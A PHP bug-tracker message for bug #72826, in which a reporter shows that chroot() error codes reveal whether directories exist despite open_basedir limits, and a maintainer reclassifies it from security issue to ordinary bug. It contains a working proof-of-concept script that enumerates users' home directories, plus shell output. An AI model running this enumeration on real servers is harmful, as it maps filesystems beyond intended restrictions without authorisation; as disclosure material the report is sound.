Sec Bug->Bug #72826 [Opn]: open_basedir bypass via enumerating error msg returned by chroot()
| From: | cmb@php.net | Date: | Mon, 12 Jul 2021 15:40:16 +0000 |
| Subject: | Sec Bug->Bug #72826 [Opn]: open_basedir bypass via enumerating error msg returned by chroot() | ||
| References: | 1 | Groups: | php.bugs |
| Request: | Send a blank email to php-bugs+get-234982@lists.php.net to get a copy of this message | ||
Edit report at https://bugs.php.net/bug.php?id=72826&edit=1
ID: 72826
Updated by: cmb@php.net
Reported by: zero_420_ at yahoo dot com
Summary: open_basedir bypass via enumerating error msg
returned by chroot()
Status: Open
-Type: Security
+Type: Bug
Package: Safe Mode/open_basedir
Operating System: ubuntu
PHP Version: 5.5.38
Block user comment: N
Private report: Y
New Comment:
open_basedir bypasses are not considered to be security issues;
cf. <https://externals.io/message/105606>
and <https://externals.io/message/115406>.
Previous Comments:
------------------------------------------------------------------------
[2021-05-20 12:41:35] cmb@php.net
> chroot seems to be missing a call to
> PG(open_basedir)/php_check_open_basedir_ex
Indeed. I don't see why this would qualify as security issue,
though, since the exploit would require that an attacker can run
arbitrary scripts, in which case all bets are off. That would not
be a sec issue according to our classification[1]. I'll leave
that for someone with a better background on POSIX to decide.
[1] <https://wiki.php.net/security#not_a_security_issue>
------------------------------------------------------------------------
[2016-08-13 08:42:04] zero_420_ at yahoo dot com
Description:
------------
in the process of testing i believe i have discovered a possible security issue/information
disclosure
error message returned by chroot() enables enumeration of directories regardless of open_basedir
settings
chroot(): Operation not permitted (errno 1) ==> directory exists
chroot(): No such file or directory (errno 2) ==> directory !exists
Test script:
---------------
<?php
ini_set('open_basedir', getcwd());
printf("basedir: %s\n", ini_get('open_basedir'));
$dirlist = array();
$found = array();
for ($n = 0; $n < 9000; $n++) {
$uid = @posix_getpwuid($n);
if (!empty($uid)) {
@array_push($dirlist, $uid['dir']);
}
}
foreach ($dirlist as $path) {
$err['message']='';
@chroot($path);
$err = error_get_last();
if(strpos($err['message'],'(errno 1)')!==false){
array_push($found, $path);
}
}
foreach (array_unique($found) as $dir) {
printf("found directory: %s\n", $dir);
}
Expected result:
----------------
with a security setting like open_basedir enforced
it should not be possible to disclose information about the structure of the underlying filesystem
beyond the directory specified by the open_basedir directive.
ive provided a small proof of concept to demonstrate how this can be used to map out the directory
structure
chroot seems to be missing a call to PG(open_basedir)/php_check_open_basedir_ex
Actual result:
--------------
(drop@logic:/tmp)$ php --version
PHP 5.5.9-1ubuntu4.19 (cli) (built: Jul 28 2016 19:31:33)
(drop@logic:/tmp)$ php -a
Interactive mode enabled
php > ini_set('open_basedir', getcwd());
php > printf("basedir: %s\n", ini_get('open_basedir'));
basedir: /tmp
php > @chroot('/');
php > print_r(error_get_last());
Array
(
[type] => 2
[message] => chroot(): Operation not permitted (errno 1)
[file] => php shell code
[line] => 1
)
php > @chroot('/lol');
php > print_r(error_get_last());
Array
(
[type] => 2
[message] => chroot(): No such file or directory (errno 2)
[file] => php shell code
[line] => 1
)
php >
------------------------------------------------------------------------
--
Edit this bug report at https://bugs.php.net/bug.php?id=72826&edit=1